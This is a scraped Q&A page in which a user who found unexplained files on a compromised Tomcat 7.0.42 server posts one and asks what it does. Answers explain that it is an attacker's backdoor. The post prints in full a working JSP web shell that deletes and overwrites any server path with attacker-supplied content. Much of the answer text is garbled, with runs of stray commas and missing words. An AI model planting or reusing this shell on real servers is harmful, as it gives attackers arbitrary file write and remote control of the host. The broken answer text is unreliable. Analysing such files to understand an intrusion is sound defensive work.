Geek Answers Handbook

What does this code do

I have a web application that was recently used. Server - tomcat 7.0.42. I found files on the server that I cannot upload. Do you know why they appear? Here I will show you the contents of one of these files, can someone tell me what he is trying to do?

<%@ page language="java" pageEncoding="gbk"%>
<jsp:directive.page import="java.io.File"/>
<jsp:directive.page import="java.io.OutputStream"/>
<jsp:directive.page import="java.io.FileOutputStream"/>

<% int i=0; String method=request.getParameter("act"); if(method!=null && method.equals("yoco")) {
    String url=request.getParameter("url");
    String text=request.getParameter("smart");
    File f=new File(url);
    if(f.exists()) {
        f.delete();
    }
    try{
        OutputStream o=new FileOutputStream(f);
        o.write(text.getBytes());
        o.close();
    } catch (Exception e) {
        i++;
    %>0<%
    }
}
if(i==0){
    %>1<%
}%>
<form action='?act=yoco' method='post'>
<input size="100" value="<%=application.getRealPath("/") %>" name="url">
<br>
<textarea rows="20" cols="80" name="smart">
+4
source share
3 answers

This is similar to a rootkit that provides remote control for attackers. They create a form message for the same JSP servlet. When a mail request is received, the parameter values ​​sent to it through the POST request are stored and processed;

String url=request.getParameter("url");
String text=request.getParameter("smart");

, , url, url. , , - ;

File f=new File(url);
if(f.exists()) {
   f.delete();
}

, smart text. , url .

 OutputStream o=new FileOutputStream(f);
 o.write(text.getBytes());
 o.close();
+2

url text, text -, url.

, , -/ .

, .

+2

.

This little .jsp handles the GET request, if there are "yoco" and "url", it tries to delete the file by URL, then it tries to write the contents of the file to the file using the url parameter.

After the file is written, the file can be launched by typing its location.

It also prints 1 if it was successful, 0 if it failed while trying to write the file.

+2
source

More articles:


All Articles